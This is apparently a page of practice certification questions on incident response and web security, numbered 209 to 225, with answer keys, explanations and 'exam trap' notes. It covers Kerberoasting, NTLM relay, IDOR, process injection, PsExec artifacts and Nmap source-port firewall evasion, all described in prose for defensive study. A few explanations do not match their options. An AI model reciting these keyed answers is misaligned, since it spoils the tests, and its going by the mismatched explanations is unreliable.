D.Disabling JavaScript in the web browser.
E.Using basic regex to filter out script tags.
AnswersA, B

Contextual output encoding transforms sensitive characters into their safe HTML entity equivalents before rendering data in the browser. By applying specific encoding based on where the data is placed—HTML body, attribute, or JavaScript—the application ensures the browser treats data as content rather than executable script code.

Why this answer

Preventing XSS requires a multi-layered defense strategy focused on output handling. Encoding converts potentially dangerous characters into safe representations, preventing the browser from executing them as script code. Content Security Policy provides a powerful browser-side mechanism to restrict script execution sources.

These two methods combined address both the immediate rendering risk and the long-term architectural risk of malicious scripts being injected into the DOM or executed from unauthorized domains.

Exam trap

Candidates often suggest 'input sanitization' or 'encryption'. Sanitization is often bypassed, and encryption does not prevent XSS. Contextual output encoding is the standard, effective defense mechanism.

210
MCQhard

When analyzing a compromised system, you find evidence of 'Kerberoasting'. What is the primary objective of this attack, and what specific artifact is the attacker attempting to acquire?

A.Acquiring the TGT; goal is to forge Golden Tickets
B.Acquiring the TGS; goal is to crack service account passwords
C.Acquiring the NTLM hash; goal is Pass-the-Hash
D.Acquiring the PAC; goal is privilege escalation
AnswerB

Kerberoasting involves requesting TGS tickets for SPN-enabled accounts. These tickets are encrypted with the account's password hash. Offline cracking of these tickets reveals the plaintext password, allowing the attacker to escalate privileges if the service account has excessive permissions on the network.

Why this answer

The primary objective of Kerberoasting is to obtain service tickets for service accounts with Service Principal Names (SPNs). The attacker requests a TGS (Ticket Granting Service) ticket for a service account, which is encrypted using the account's password hash. By extracting this ticket, the attacker can move the data offline and attempt to crack the password hash without further interaction with the Domain Controller, avoiding detection by account lockout policies.

Exam trap

Candidates often think the goal is to gain immediate entry to the Domain Controller, rather than understanding that the TGS is used for offline password cracking.

211
MCQmedium

During an incident response engagement, you capture SMB authentication traffic on a subnet where an attacker has positioned a rogue device. The traffic shows NTLMv2 challenge/response pairs being relayed to a file server that does not enforce SMB signing. Which of the following best describes the security control that would have most directly prevented the relayed authentication from succeeding?

A.Enabling Extended Protection for Authentication on the domain controller
B.Enforcing SMB signing on the target file server
C.Disabling NetBIOS over TCP/IP on all workstations
D.Requiring Kerberos authentication for all domain logons
AnswerB

SMB signing cryptographically binds each message to the session key derived from the authentication exchange, so a relayed authentication cannot be reused to establish a new session. When the file server requires signing and the client cannot sign, the session fails. This directly breaks the NTLM relay because the attacker cannot produce valid signatures without possessing the session key.

Why this answer

SMB signing is the specific control that prevents NTLM relay to SMB file servers because it requires the client and server to sign every message with a session key. A relayed authentication cannot satisfy signing because the attacker does not possess the negotiated session key. Other controls like disabling NetBIOS or requiring Kerberos do not address the fundamental relay path over SMB.

Exam trap

The trap here is assuming that requiring Kerberos or disabling NetBIOS eliminates NTLM relay, when NTLM fallback over SMB remains viable unless SMB signing is enforced.

212
Multi-Selectmedium

Which TWO of the following practices are the most effective at mitigating Insecure Direct Object Reference (IDOR) vulnerabilities?

Select 2 answers
A.Implementing server-side authorization checks for every object access
B.Using random, non-sequential identifiers for objects
C.Increasing the length of session tokens
D.Employing a Web Application Firewall (WAF)
E.Moving all sensitive data to a cloud storage bucket
AnswersA, B

Verifying that the current authenticated user has explicit permission to access the requested object is the definitive mitigation for IDOR. Without this server-side validation, users can simply modify request parameters to view data belonging to other users, rendering any other security control ineffective against logical authorization bypasses.

Why this answer

Mitigating IDOR requires shifting from user-controlled identifiers to server-side access control checks. Relying on unpredictable identifiers makes guessing harder, but verifying identity and authorization for every requested object is the primary defense. These practices ensure that even if an attacker discovers a valid ID, they lack the authorization to perform operations on the underlying data, thereby closing the logical gap that allows unauthorized object access.

Exam trap

Candidates often select 'hiding' techniques like encoding IDs as a primary mitigation. They fail to realize that only server-side authorization checks provide true protection against unauthorized object access.

213
MCQeasy

A SOC analyst notices that a scheduled task on a workstation was created shortly after a user opened a malicious email attachment. The task runs a PowerShell command that downloads a file from an external IP every hour. The task is configured to run under the SYSTEM account and has no associated user logon. Which post-exploitation technique does this represent?

A.Credential dumping using LSASS memory access
B.Privilege escalation via unquoted service path
C.Lateral movement using PsExec
D.Persistence via scheduled task
AnswerD

Creating a scheduled task that runs malicious code under SYSTEM and triggers periodically is a common persistence mechanism. It survives reboots and does not require an interactive logon. The timing after a phishing attachment and the recurring download behavior strongly indicate persistence via scheduled task.

Why this answer

Scheduled tasks are a favored persistence mechanism because they can run under SYSTEM, trigger on schedules or events, and survive reboots without user interaction. The scenario shows a task created after a phishing attachment, executing a recurring download, which matches this technique. Unquoted service path, LSASS credential dumping, and PsExec lateral movement involve different artifacts such as service creation or remote execution, none of which are described.

Exam trap

The trap here is focusing on the PowerShell download and overlooking the scheduled task as the persistence mechanism that ensures recurring execution.

214
Multi-Selecthard

An incident handler is analyzing a Windows endpoint where an adversary successfully executed a living-off-the-land binary (LotLB) to establish an unauthorized tunnel and pivot deeper into the internal network. Which TWO forensic artifacts should the analyst examine to reconstruct the command-line arguments and parent-child process creation chain associated with this execution? (Choose TWO)

Select 2 answers
A.Windows Security Event Log ID 4688 with advanced command-line auditing enabled
B.Windows System Event Log ID 7045 tracking installed services
C.Volatile memory dumps analyzed with volatility plugins such as pslist, pstree, and cmdline
D.Dynamic Host Configuration Protocol (DHCP) operational logs
E.Internet Information Services (IIS) W3C web server access logs
AnswersA, C

Event ID 4688 records process creation details, including user context and exact command-line arguments, provided the appropriate Group Policy setting is active. This makes it a primary source for identifying living-off-the-land binaries and their execution parameters.

Why this answer

Reconstructing process execution lineages requires capturing volatile process trees and detailed argument strings. Windows Security Event Log ID 4688, when command-line auditing is enabled, records the exact parameters passed to binaries. Additionally, memory analysis tools inspect unswapped physical RAM to recover remnants of terminated process execution blocks, making these two sources vital for handling advanced adversary tradecraft.

Exam trap

Candidates frequently select the Windows Firewall logs or Application event logs, forgetting that process lineage and command-line execution parameters are strictly managed by the kernel process creation APIs and security auditing subsystems.

215
Multi-Selecthard

An organization detects a web-based attack and wants to perform a thorough investigation. Which THREE artifacts should the team collect to analyze the adversary's entry point and activity?

Select 3 answers
A.HTTP access and error logs from the web server.
B.System event logs for all workstations in the local network.
C.Application-level logs and database transaction logs.
D.Email gateway logs showing internal-to-external communication patterns.
E.Network perimeter firewall and WAF traffic logs.
AnswersA, C, E

Web server logs are the primary source for identifying the attacker's source IP, the requests made, and the server's response codes. Error logs often reveal failed exploitation attempts or crashes caused by malicious payloads, providing critical context for how the attacker attempted to compromise the application layer.

Why this answer

Analyzing a web-based attack requires a multi-layered approach. By correlating web server logs, application-level logs, and firewall traffic, investigators can reconstruct the full attack chain from the initial exploit attempt to post-exploitation activity. This holistic view is necessary to verify the entry point, understand the impact, and ensure all malicious persistence mechanisms are identified and removed during the remediation process, preventing the attacker from regaining unauthorized access to the environment.

Exam trap

Test-takers often overlook application-level and database logs, focusing solely on network firewalls and perimeter devices when investigating application-layer web attacks.

216
MCQeasy

Which security principle is violated when an IAM user is assigned the 'AdministratorAccess' policy for daily operational tasks?

A.Separation of Duties.
B.Principle of Least Privilege.
C.Defense in Depth.
D.Security through Obscurity.
AnswerB

The Principle of Least Privilege requires that users be granted only the minimum permissions needed to complete a task. 'AdministratorAccess' provides broad, excessive permissions that are rarely required for daily operational tasks. Using such an account for routine work exposes the organization to unnecessary risk if the account is compromised.

Why this answer

The 'AdministratorAccess' policy provides full, unrestricted access to all services. Assigning this to daily tasks violates the Principle of Least Privilege, which dictates that users should only have the minimum permissions necessary to perform their jobs. Over-privileged accounts are a significant liability, as they allow an attacker who compromises the account to perform any action, including deleting logs or resources, which massively increases the potential impact of an incident.

Exam trap

Candidates sometimes confuse the principle of least privilege with separation of duties or defense-in-depth when evaluating over-assigned administrative access policies.

217
MCQmedium

Which Nmap scan flag allows a responder to bypass simple packet filters by using specific source ports, such as port 53, to appear as legitimate DNS traffic?

A.--spoof-mac
B.--source-port 53
C.-f
D.--data-length
AnswerB

Using --source-port 53 forces Nmap to use port 53 as the source port for all scanning packets. Since many firewalls are configured to allow DNS traffic (UDP/TCP 53) to pass through to internal hosts, this simple manipulation can bypass basic port-based filters, allowing the scanner to reach previously blocked internal network segments.

Why this answer

The --source-port flag allows for the manipulation of the packet's source port, which is a common technique for bypassing firewall rules configured to permit traffic from trusted services like DNS. This is useful for responders trying to map networks where basic ingress/egress filtering is in place, as it mimics expected protocol behavior to slip through simple security controls.

Exam trap

Candidates frequently confuse source port manipulation with destination port manipulation. They mistakenly believe changing the destination port is the primary method to bypass filters, ignoring the specific syntax for source port spoofing.

218
MCQmedium

An incident responder investigates a RESTful API where users can access sensitive records simply by incrementing an integer ID in the endpoint URL, such as changing /api/v1/users/104/profile to /api/v1/users/105/profile without providing additional authorization checks. Which vulnerability class does this scenario represent?

A.Cross-Site Request Forgery
B.Broken Object Level Authorization
C.Server-Side Request Forgery
D.Mass Assignment
AnswerB

APIs frequently expose endpoints that handle object identifiers, creating a wide attack surface for object-level access control flaws. Without proper authorization validation verifying whether the logged-in user owns the requested object ID, attackers easily iterate through identifiers to read or modify private data records.

Why this answer

This scenario clearly demonstrates Broken Object Level Authorization, where authorization validation is missing in the object identifier tier. Attackers exploit this design flaw to harvest unauthorized records horizontally or vertically. Incident handlers must recognize API1:2023 risks during web application forensics to properly scope data exfiltration incidents and remediate flawed access control logic across microservices.

Exam trap

Test-takers often mix up BOLA and IDOR or confuse them with broken function-level authorization, overlooking that resource-specific object manipulation points squarely to object-level flaws.

219
MCQmedium

An incident responder investigates a web application running a legacy PHP backend. Users report that searching for specific product SKUs causes the application to dump database table structures directly onto the results page. Which underlying vulnerability class is most likely responsible for this behavior?

A.Cross-Site Scripting via injected JavaScript payloads in the SKU search field
B.Error-based SQL injection via unescaped search input processed directly by the database engine
C.Remote Code Execution via insecure deserialization of serialized PHP objects
D.XML External Entity injection via malformed search queries processed by an XML parser
AnswerB

Unsanitized user inputs concatenated directly into SQL query strings allow attackers to manipulate execution flow and trigger database errors. Verbose database exceptions outputted to the user interface reveal structural details, making error-based SQL injection the primary suspect for this specific application behavior.

Why this answer

Error-based SQL injection occurs when database error messages are displayed directly to the end user through the web interface. Attackers leverage these verbose debugging messages to extract database schemas, table names, and sensitive column contents piece by piece. Remediating this requires implementing custom error handling and parameterized queries globally.

Exam trap

Candidates often confuse 'SQL Injection' with 'Information Disclosure'. While the result is information disclosure, the vulnerability class responsible for the dump is specifically SQL injection via unescaped input.

220
MCQhard

An incident responder is analyzing a Windows memory image and wants to identify a malicious process that has no corresponding file on disk. Which memory analysis artifact is most useful for this purpose?

A.The registry hives extracted from the memory image
B.The Windows event log for process creation, such as Event ID 4688
C.The process list with associated memory sections
D.The list of loaded kernel drivers
AnswerC

Enumerating processes and their memory sections reveals executable regions that may not map to a file on disk. Tools such as Volatility can list process memory maps and identify sections with no backing file, which is characteristic of injected or fileless code. This directly surfaces a process whose code exists only in memory, answering the scenario's need.

Why this answer

Memory section analysis maps each process's virtual memory regions and flags those without a corresponding file on disk. Injected or reflective-loading code appears as executable pages with no file path, which is the hallmark of a fileless process. This is the most direct way to identify a running process that never touched disk.

Exam trap

The trap here is assuming process creation logs or registry artifacts prove fileless execution, when only memory section mapping reveals code without an on-disk backing file.

221
MCQmedium

During an investigation, you observe an attacker using 'PsExec' to move laterally. What is the primary artifact created by PsExec that can be used to track its execution across the network?

A.The creation of a temporary file named 'psexec.exe' in the root directory.
B.The installation of a service named 'PSEXESVC'.
C.An entry in the 'Run' registry key for persistence.
D.A specific user-mode process named 'psexec_agent'.
AnswerB

PsExec operates by deploying a service named 'PSEXESVC' to the remote machine. Monitoring for the registration and execution of this service is a standard and highly effective detection technique for responders. It is the core mechanism PsExec uses to achieve remote code execution as a system user.

Why this answer

PsExec functions by creating a remote service named 'PSEXESVC' on the target machine. This service executes the payload and is then cleaned up. Identifying the creation and deletion of this specific service name in the Windows System event logs (Event ID 7045) is the most reliable way to track PsExec activity, provided that the logs have not been cleared by the attacker.

Exam trap

Candidates often look for process execution logs or file creation, missing the specific service installation artifact that is the hallmark of PsExec's remote execution mechanism.

222
MCQmedium

During an incident response on a Windows 10 endpoint, you observe that a malicious process has injected a thread into a remote process on the same host using the CreateRemoteThread API. The injected code is now executing in the context of a legitimate system process. Which of the following best describes the primary purpose of this technique from the attacker's perspective?

A.To harvest credentials from the LSASS process memory.
B.To evade detection by masquerading malicious code within a trusted process.
C.To establish a covert channel over DNS for command and control.
D.To escalate privileges by exploiting a vulnerable driver in the kernel.
AnswerB

CreateRemoteThread injection allows an attacker to run code inside a legitimate process, such as explorer.exe or svchost.exe. Security tools often trust these processes, so the malicious activity may blend in with normal behavior. This provides stealth and persistence, making it the primary purpose in the given scenario.

Why this answer

Injecting a thread into a remote process using CreateRemoteThread enables an adversary to execute arbitrary code within the address space of a trusted process. This helps evade detection because many security solutions allowlist or trust system processes. The technique does not inherently escalate privileges, create network tunnels, or dump credentials, making the evasion-focused description the correct one.

Exam trap

The trap here is assuming that any process injection automatically leads to privilege escalation, when in fact the primary goal is often stealth and defense evasion.

223
MCQmedium

An incident handler is reviewing compromised Active Directory domain credentials and notices that an attacker successfully recovered the cleartext password of a service account using an offline cracking tool. Which specific technique did the attacker most likely leverage to target this non-user domain object?

A.AS-REP Roasting targeting user accounts with Kerberos pre-authentication disabled.
B.NTLM relaying against local SMB signing configurations.
C.Pass-the-Hash utilizing harvested NTLM password hashes from memory.
D.Kerberoasting by requesting a service ticket for an SPN and cracking it offline.
AnswerD

Kerberoasting leverages any standard domain user account to request a service ticket for an arbitrary Service Principal Name, allowing attackers to export the ticket and crack the underlying service account password completely offline.

Why this answer

Kerberoasting allows any authenticated domain user to request a Service Principal Name ticket, extract the service ticket encrypted with the target service account's NTLM hash, and crack it offline without generating account lockout events. This represents a primary threat for enterprise service accounts utilizing weak passwords.

Exam trap

Candidates often confuse Kerberoasting with AS-REP Roasting; however, AS-REP Roasting targets user accounts configured with pre-authentication disabled, whereas Kerberoasting specifically targets service accounts possessing assigned Service Principal Names.

224
MCQhard

An analyst discovers that an attacker is using AI to dynamically change the command-and-control (C2) infrastructure based on defensive responses. Which IR strategy is best suited to disrupt this behavior?

A.Maintain the current defense and wait for the C2 to remain static.
B.Implement proactive deception techniques to feed the attacker's AI false data.
C.Block all outbound traffic at the perimeter to stop the communication.
D.Perform a full system wipe of all endpoints involved in the C2 network.
AnswerB

Feeding an adversary's AI false data creates a poisoned feedback loop. By injecting deceptive signals, the responder can cause the attacker's infrastructure to adapt in ways that are disadvantageous, such as routing to honeypots. This forces the adversary to waste resources and reveals their infrastructure, which can then be systematically blocked or neutralized.

Why this answer

The most effective way to counter dynamic, AI-driven infrastructure is to implement 'proactive deception' and 'automated environment hardening.' By creating a moving target environment, the responder forces the attacker's AI to constantly adjust to false or unstable indicators. This disrupts the adversary's ability to maintain a persistent connection, effectively neutralizing the advantage gained by their automated infrastructure adjustments during the incident containment phase.

Exam trap

Candidates frequently choose passive monitoring or static blocking tools, failing to recognize that AI-driven threats adapt too quickly for static defenses to be effective.

225
MCQmedium

An incident responder is using an LLM to automate the parsing of obfuscated PowerShell scripts found during a breach. What is the primary operational risk when feeding these scripts into a cloud-based LLM API?

A.The LLM will automatically execute the PowerShell commands in the cloud environment.
B.The LLM will refuse to analyze the script because it contains malicious syntax.
C.The input data may be retained and used for future model training, potentially leaking incident indicators.
D.The LLM will inject backdoors into the code during the deobfuscation process.
AnswerC

Cloud providers often ingest user input for continuous model improvement. If sensitive environment variables, internal server names, or specific attack indicators are present in the script, they could be reflected in future model outputs, resulting in a significant data leakage incident that compromises the organization's security posture.

Why this answer

Sharing obfuscated code with cloud-based LLMs risks leaking proprietary infrastructure details or sensitive credentials embedded within scripts into the vendor's training corpus. This data exposure violates confidentiality policies and undermines incident containment efforts. Security professionals must utilize local models or sanitized code snippets to prevent inadvertent data exfiltration while leveraging AI-assisted analysis for complex malware triage during active incident response workflows.

Exam trap

Candidates often focus on the efficiency of the AI tool, failing to consider the severe privacy and security risks of uploading potentially sensitive, proprietary, or breach-related data to a public cloud-based LLM.

Page 2

Page 3 of 5

Page 4

All pages